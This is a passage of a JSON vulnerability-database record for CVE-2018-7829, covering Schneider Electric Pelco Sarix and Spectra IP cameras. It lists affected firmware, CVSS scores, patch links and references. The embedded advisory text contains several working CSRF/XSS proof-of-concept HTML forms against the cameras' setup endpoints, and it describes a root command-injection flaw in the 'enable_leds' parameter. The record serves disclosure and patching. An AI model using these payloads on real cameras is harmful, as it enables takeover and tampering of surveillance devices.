"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime319-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime319-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vi_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vi:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vs_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vs:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ime3122-1vp_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ime3122-1vp:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixes1_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixes1:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe11_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe11:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe21_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe21:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:schneider-electric:ixe31_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "2.2.3.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:schneider-electric:ixe31:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7829"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability discovered by Gjoko Krstic",
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
],
"trust": 0.2
},
"cve": "CVE-2018-7829",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-7829",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-23302",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2019-16263",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-7829",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-7829",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-16263",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-913",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "NVD",
"id": "CVE-2018-7829"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-913"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An Improper Neutralization of Special Elements in Query vulnerability exists in the 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera which allows an attacker to execute arbitrary system commands. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Contains a vulnerability in improper neutralization of special elements of data query logic.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera and SchneiderElectricSpectraEnhancedPTZCamera are products of Schneider Electric. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras. The Schneider Electric SpectraEnhancedPTZCamera is a series of spherical IP cameras. Security vulnerabilities exist in SchneiderElectric1stGen.PelcoSarixEnhancedCamera and SpectraEnhancedPTZCamera. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter \u0027enable_leds\u0027 locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. \nSchneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities\n\n\nVendor: Schneider Electric SE\nProduct web page: https://www.pelco.com\nAffected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)\n Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)\n Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)\n\nSummary: Pelco offers the broadest selection of IP cameras designed\nfor security surveillance in a wide variety of commercial and industrial\nsettings. From our industry-leading fixed and high-speed IP cameras to\npanoramic, thermal imaging, explosionproof and more, we offer a camera\nfor any environment, any lighting condition and any application. \nWhen nothing but the best will do. SarixaC/ Enhanced Range cameras\nprovide the most robust feature-set for your mission-critical applications. \nWith SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image\nin difficult lighting conditions such as a combination of bright areas,\nshaded areas, and intense light. Designed with superior reliability,\nfault tolerance, and processing speed, these rugged fixed IP cameras\nensure you always get the video that you need. \n\nDesc: Pelco cameras suffer from multiple dom-based, stored and reflected\nXSS vulnerabilities when input passed via several parameters to several\nscripts is not properly sanitized before being returned to the user. \n\nTested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown\n MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)\n Lighttpd/1.4.28\n PHP/5.3.0\n\n\nVulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2017-5415\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php\n\n\n07.04.2017\n\n--\n\n\nCSRF/XSS on username parameter:\n-------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/dot1x/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"dot1x\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"protocol\" value=\"EAP\u0026#45;TLS\" /\u003e\n \u003cinput type=\"hidden\" name=\"inner\u0026#95;auth\" value=\"CHAP\" /\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\u0027\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"blah\" /\u003e\n \u003cinput type=\"hidden\" name=\"anonymous\u0026#95;id\" value=\"\u0026#13;\" /\u003e\n \u003cinput type=\"hidden\" name=\"ca\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"client\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\u0026#95;password\" value=\"test\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:\n-------------------------------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"hostname\" value=\u0027\"\u003e\u003cscript\u003ealert(2)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"http\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(3)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"rtsp\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"dhcp\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\u0027\"\u003e\u003cscript\u003ealert(5)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\u0027\"\u003e\u003cscript\u003ealert(6)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"gateway\" value=\u0027\"\u003e\u003cscript\u003ealert(7)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"nameservers\" value=\u0027\"\u003e\u003cscript\u003ealert(8)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on version parameter:\n------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/snmp/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"version\" value=\u0027\";alert(9)//\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;community\u0026#95;string\" value=\"public\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;receiver\u0026#95;address\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;trap\u0026#95;community\u0026#95;string\" value=\"trapbratce\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:\n----------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/system/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"device\u0026#95;name\" value=\u0027ZSL\"\u003e\u003cscript\u003ealert(10)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;leds\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"smtp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(11)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\u0026#95;from\u0026#95;dhcp\" value=\"false\" /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\" value=\"\u0027;alert(12)//\u0027\" /\u003e\n \u003cinput type=\"hidden\" name=\"region\" value=\"Macedonia\u0027;alert(13)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"zone\" value=\"Kumanovo\u0027;alert(14)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;time\u0026#95;overlay\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;name\u0026#95;overlay\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"position\" value=\"topright\" /\u003e\n \u003cinput type=\"hidden\" name=\"date\u0026#95;format\" value=\"0\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nXSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:\n--------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/events/handlers/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"id\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;sentinel\" value=\"relay\u0026#95;sentinel\" /\u003e\n \u003cinput type=\"hidden\" name=\"name\" value=\u0027\"\u003e\u003cscript\u003ealert(15)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"type\" value=\"Ftp\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;to\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;from\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;subject\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;message\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\u0026#95;scale\" value=\"K\" /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(16)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;username\" value=\u0027\"\u003e\u003cscript\u003ealert(17)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;password\" value=\u0027\"\u003e\u003cscript\u003ealert(18)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;base\u0026#95;path\" value=\u0027\"\u003e\u003cscript\u003ealert(19)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;bankName\" value=\"GPIO\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;index\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;on\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;off\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;pulse\u0026#95;count\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;start0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;stop0\" value=\"\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7829"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "PACKETSTORM",
"id": "143313"
}
],
"trust": 2.97
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelco_rce.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_xss.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7829",
"trust": 3.1
},
{
"db": "SCHNEIDER",
"id": "SEVD-2019-045-03",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "42307",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "42307",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2019-16263",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-913",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "143313",
"trust": 0.2
},
{
"db": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "143315",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070080",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42309",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7827",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070075",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "NVD",
"id": "CVE-2018-7829"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-913"
}
]
},
"id": "VAR-201905-1041",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16263"
}
]
},
"last_update_date": "2023-12-18T12:18:59.108000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SEVD-2019-045-03",
"trust": 0.8,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"title": "SchneiderElectric1stGen.PelcoSarixEnhancedCamera and SpectraEnhancedPTZCamera Patch for any OS command execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/162749"
},
{
"title": "Schneider Electric 1st Gen. Pelco Sarix Enhanced Camera and Spectra Enhanced PTZ Camera Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=92891"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16263"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-913"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-943",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015494"
},
{
"db": "NVD",
"id": "CVE-2018-7829"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7829"
},
{
"trust": 0.9,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/42307/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42309/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070080"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143315"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129667"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070075"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143313"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129665"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/dot1x/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/system/general/update\""
},
{
"trust": 0.1,
